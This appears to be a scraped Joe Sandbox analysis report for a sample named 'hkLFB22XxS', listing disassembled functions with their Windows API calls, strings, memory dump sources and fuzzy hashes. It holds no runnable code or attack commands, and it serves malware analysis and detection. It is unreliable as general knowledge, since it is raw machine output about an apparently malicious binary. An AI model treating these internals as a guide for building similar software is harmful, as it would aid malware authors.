                                                            • Instruction ID: 900ae317e058769958189d45c5b121bf4dcc72227ec0874f53f23deff7e0c4d4
                                                            • Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                            • Instruction Fuzzy Hash: D2621C74A14258DBEB24CFA4C850BDEB372EF58704F1091AAD10DEB390EB759E81CB59
                                                            Function 008797E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00815045: _fseek.LIBCMT ref: 0081505D
                                                              • Part of subcall function 008799BE: _wcscmp.LIBCMT ref: 00879AAE
                                                              • Part of subcall function 008799BE: _wcscmp.LIBCMT ref: 00879AC1
                                                            • _free.LIBCMT ref: 0087992C
                                                            • _free.LIBCMT ref: 00879933
                                                            • _free.LIBCMT ref: 0087999E
                                                              • Part of subcall function 00832F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00839C64), ref: 00832FA9
                                                              • Part of subcall function 00832F95: GetLastError.KERNEL32(00000000,?,00839C64), ref: 00832FBB
                                                            • _free.LIBCMT ref: 008799A6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction ID: 755e77c90c59edd3ba7b05f066692a0e44371ce74b75c849878adf10774c2316
                                                            • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction Fuzzy Hash: 4A515FB1904618AFDF249F68DC41A9EBB79FF48310F0044AEF649E7241DB315A80CF59
                                                            Function 0083493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction ID: 6e353ec0c2fdb2fe8a1859eb66f8331a6a78e37d3027d0f5d3437d16d281cf5f
                                                            • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction Fuzzy Hash: 4441C47060071A9BDF288EA9C880AAF7BAAFFC0360F24957DE855C7650D774AD418BC4
                                                            Function 008173E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0084EE62
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0084EEAC
                                                              • Part of subcall function 008148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008148A1,?,?,008137C0,?), ref: 008148CE
                                                              • Part of subcall function 008309D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008309F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: 28db5dc1e684f5d72bd953cfac5ae2e20c06d827afc45471f7f31233b8ef6905
                                                            • Instruction ID: 776cb8296c7e742529e0d7c8a72af704d68bc1f4cb5537b8da4b60104baa3dd2
                                                            • Opcode Fuzzy Hash: 28db5dc1e684f5d72bd953cfac5ae2e20c06d827afc45471f7f31233b8ef6905
                                                            • Instruction Fuzzy Hash: 1F21847191025C9BCB15DF98C845BEE7BFCFF49314F04405AE548E7241DBB899898F92
                                                            Function 0087901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: b99d80ef4f886bf4ce4840215677ffcd677080d8447e43390edb9c9ccc0d0094
                                                            • Instruction ID: dfae4d3cae489a2fbbca9c9318db39f9aae066cea1c6effba7f114290e404d60
                                                            • Opcode Fuzzy Hash: b99d80ef4f886bf4ce4840215677ffcd677080d8447e43390edb9c9ccc0d0094
                                                            • Instruction Fuzzy Hash: 0F01F9718146186EDB28C6A8C816FFEBBF8EB01301F00419EF592D2181E575E60487A0
                                                            Function 00879B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00879B82
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00879B99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: be05fc86eaaaacf1a50803bcc5548c323606592db4d460c09d5f1df34030782c
                                                            • Instruction ID: 0710df6e81f13c5daaea55477605edb9dd68d1fb2667dd6b342bb228c72e89f8
                                                            • Opcode Fuzzy Hash: be05fc86eaaaacf1a50803bcc5548c323606592db4d460c09d5f1df34030782c
                                                            • Instruction Fuzzy Hash: B6D05E7954030DABDB14ABD0DC0EF9A773CF704704F0042A2BF64D11A2DEB495988B95
                                                            Function 0088CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 181f809692498b197cc2401ee16ac756d6cba0cc665fcc129773b682b4de5454
                                                            • Instruction ID: 7099150e2796904f6f42ac5b4c6cf9c75d6e51daec3b9b2fd6883e1c6528b5fe
                                                            • Opcode Fuzzy Hash: 181f809692498b197cc2401ee16ac756d6cba0cc665fcc129773b682b4de5454
                                                            • Instruction Fuzzy Hash: 46F138716087059FC714EF28C484A6ABBE5FF88314F14892EF899DB292D771E945CF82
                                                            Function 0081F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008303D3
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008303DB
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008303E6
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008303F1
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008303F9
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00830401
                                                              • Part of subcall function 00826259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0081FA90), ref: 008262B4
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0081FB2D
                                                            • OleInitialize.OLE32(00000000), ref: 0081FBAA
                                                            • CloseHandle.KERNEL32(00000000), ref: 008549F2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID:
                                                            • API String ID: 1986988660-0
                                                            • Opcode ID: 9d454f66717a8e6b381d65a71e7a4155cff501d468d6b859c5fbbe7ba02f3240
                                                            • Instruction ID: 5c8fed9bc808c5f0d958d0298438e30a2f7200fdb936c6972a2684db71e2ffc4
                                                            • Opcode Fuzzy Hash: 9d454f66717a8e6b381d65a71e7a4155cff501d468d6b859c5fbbe7ba02f3240
                                                            • Instruction Fuzzy Hash: F281A9B090224C8FC788EFA9E9556557BF6FB88318B10872BD118C7362FB354468CF59
                                                            Function 008143DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00814401
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008144A6
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008144C3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: 57284abf9ff3ad9cbe82b1771651b69e63124e66d1236ca94e2a3de629b55239
                                                            • Instruction ID: a33cda4ca4cb9a1ddf0e6fc10a7bc9dd49765f45e0e7318b15007fb05e8c5959
                                                            • Opcode Fuzzy Hash: 57284abf9ff3ad9cbe82b1771651b69e63124e66d1236ca94e2a3de629b55239
                                                            • Instruction Fuzzy Hash: EA316FB05067059FD720DF24D8847DBBBE8FF48308F000A2EE59AC3251E775A988CB96
                                                            Function 0083594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 00835963
                                                              • Part of subcall function 0083A3AB: __NMSG_WRITE.LIBCMT ref: 0083A3D2
                                                              • Part of subcall function 0083A3AB: __NMSG_WRITE.LIBCMT ref: 0083A3DC
                                                            • __NMSG_WRITE.LIBCMT ref: 0083596A
                                                              • Part of subcall function 0083A408: GetModuleFileNameW.KERNEL32(00000000,008D43BA,00000104,?,00000001,00000000), ref: 0083A49A
                                                              • Part of subcall function 0083A408: ___crtMessageBoxW.LIBCMT ref: 0083A548
                                                              • Part of subcall function 008332DF: ___crtCorExitProcess.LIBCMT ref: 008332E5
                                                              • Part of subcall function 008332DF: ExitProcess.KERNEL32 ref: 008332EE
                                                              • Part of subcall function 00838D68: __getptd_noexit.LIBCMT ref: 00838D68
                                                            • RtlAllocateHeap.NTDLL(017B0000,00000000,00000001,00000000,?,?,?,00831013,?), ref: 0083598F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 359caf2b0c7fb73a4b2fc4639a35e682d7a05af177178f57be9cc97287755a8a
                                                            • Instruction ID: 9f6112e85946098db2965002016c16fc80cb71ed2bab159227f63c82473eae09
                                                            • Opcode Fuzzy Hash: 359caf2b0c7fb73a4b2fc4639a35e682d7a05af177178f57be9cc97287755a8a
                                                            • Instruction Fuzzy Hash: F7019231201B15DFE6156B69FC52B6E7B88FFC1774F50012AFD01EB192DAB09D0186E6
                                                            Function 00879B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008797D2,?,?,?,?,?,00000004), ref: 00879B45
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008797D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00879B5B
                                                            • CloseHandle.KERNEL32(00000000,?,008797D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00879B62
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: 6cc7bf332dd1df1a025142fc7655d15ba312497bafc5c001adb0b0a31466299d
                                                            • Instruction ID: 4b2cb47541ae7bb83464eb87d7964bc0bc9c6185e6e255299000a68494b950a9
                                                            • Opcode Fuzzy Hash: 6cc7bf332dd1df1a025142fc7655d15ba312497bafc5c001adb0b0a31466299d
                                                            • Instruction Fuzzy Hash: 7FE08632180224F7D7222B64EC09FCA7B18FB05771F148121FB54E90E187B1651197D8
                                                            Function 00878F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00878FA5
                                                              • Part of subcall function 00832F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00839C64), ref: 00832FA9
                                                              • Part of subcall function 00832F95: GetLastError.KERNEL32(00000000,?,00839C64), ref: 00832FBB
                                                            • _free.LIBCMT ref: 00878FB6
                                                            • _free.LIBCMT ref: 00878FC8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction ID: d3468ea3e3ed0301e869ec0c6a0aaee37649d7bb7206f2deea20280bae8b6b40
                                                            • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction Fuzzy Hash: 0AE012B16097018ACA34A57CAD44AA357EEFF88360B18081DF40DDB146DE24E8419165
                                                            Function 0081AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 4153402280970eae16d154b287b3ba5d5cde0aa3709b27e114d3706efe400cc2
                                                            • Instruction ID: 052a2563950a78648b0bfa1bffc0ca1930241fba52d779e77d598131410915f5
                                                            • Opcode Fuzzy Hash: 4153402280970eae16d154b287b3ba5d5cde0aa3709b27e114d3706efe400cc2
                                                            • Instruction Fuzzy Hash: AA224770509645DFCB28DF18C494AAABBE5FF84304F15895DE89ACB362D731EC85CB82
                                                            Function 00814DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: EA06
                                                            • API String ID: 4104443479-3962188686
                                                            • Opcode ID: b207e315c57bc0728f0f478d85032cf75a433c260c2e2fdd3cff332974708e3a
                                                            • Instruction ID: 0e85d6223915c824bba4e98d0f68bb6702aa521b06bd23c07099b7fba56f82e6
                                                            • Opcode Fuzzy Hash: b207e315c57bc0728f0f478d85032cf75a433c260c2e2fdd3cff332974708e3a
                                                            • Instruction Fuzzy Hash: F7418071A0465C9BCF115B68D8517FE7FAEFF45324F685065E842DB382C5218DC087E2
                                                            Function 0081492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00814992
                                                              • Part of subcall function 008335AC: __lock.LIBCMT ref: 008335B2
                                                              • Part of subcall function 008335AC: DecodePointer.KERNEL32(00000001,?,008149A7,008681BC), ref: 008335BE
                                                              • Part of subcall function 008335AC: EncodePointer.KERNEL32(?,?,008149A7,008681BC), ref: 008335C9
                                                              • Part of subcall function 00814A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00814A73
                                                              • Part of subcall function 00814A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00814A88
                                                              • Part of subcall function 00813B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00813B7A
                                                              • Part of subcall function 00813B4C: IsDebuggerPresent.KERNEL32 ref: 00813B8C
                                                              • Part of subcall function 00813B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008D62F8,008D62E0,?,?), ref: 00813BFD
                                                              • Part of subcall function 00813B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00813C81
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008149D2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
                                                            • Opcode ID: 274510b4a6a67a68707c700a4de3f4d131d9c98eac4e06b1d49cda93939a3503
                                                            • Instruction ID: 9ed35ee68a3f454eff0612527e88094350ed2657ca6e0e85d64bd92e7c92bb69
                                                            • Opcode Fuzzy Hash: 274510b4a6a67a68707c700a4de3f4d131d9c98eac4e06b1d49cda93939a3503
                                                            • Instruction Fuzzy Hash: 22116771909315ABC700EF68E80594ABFE9FF98710F004A1BF085C72B1EB709698CB96
                                                            Function 00815DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00815981,?,?,?,?), ref: 00815E27
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00815981,?,?,?,?), ref: 0084E19C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 982403327bff05acfec3ff1d28d2781832cd9d3b963592f828d956f79ca2b486
                                                            • Instruction ID: 1a617657b4d09fc16c57a12bf52c74d5edbff1f3da75b2177eecdb4521e40f73
                                                            • Opcode Fuzzy Hash: 982403327bff05acfec3ff1d28d2781832cd9d3b963592f828d956f79ca2b486
                                                            • Instruction Fuzzy Hash: 88019270684708FEF3651E24CC8AFA63B9CFF01768F108319BAE59A1E0C6B01E858B54
                                                            Function 00830FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0083594C: __FF_MSGBANNER.LIBCMT ref: 00835963
                                                              • Part of subcall function 0083594C: __NMSG_WRITE.LIBCMT ref: 0083596A
                                                              • Part of subcall function 0083594C: RtlAllocateHeap.NTDLL(017B0000,00000000,00000001,00000000,?,?,?,00831013,?), ref: 0083598F
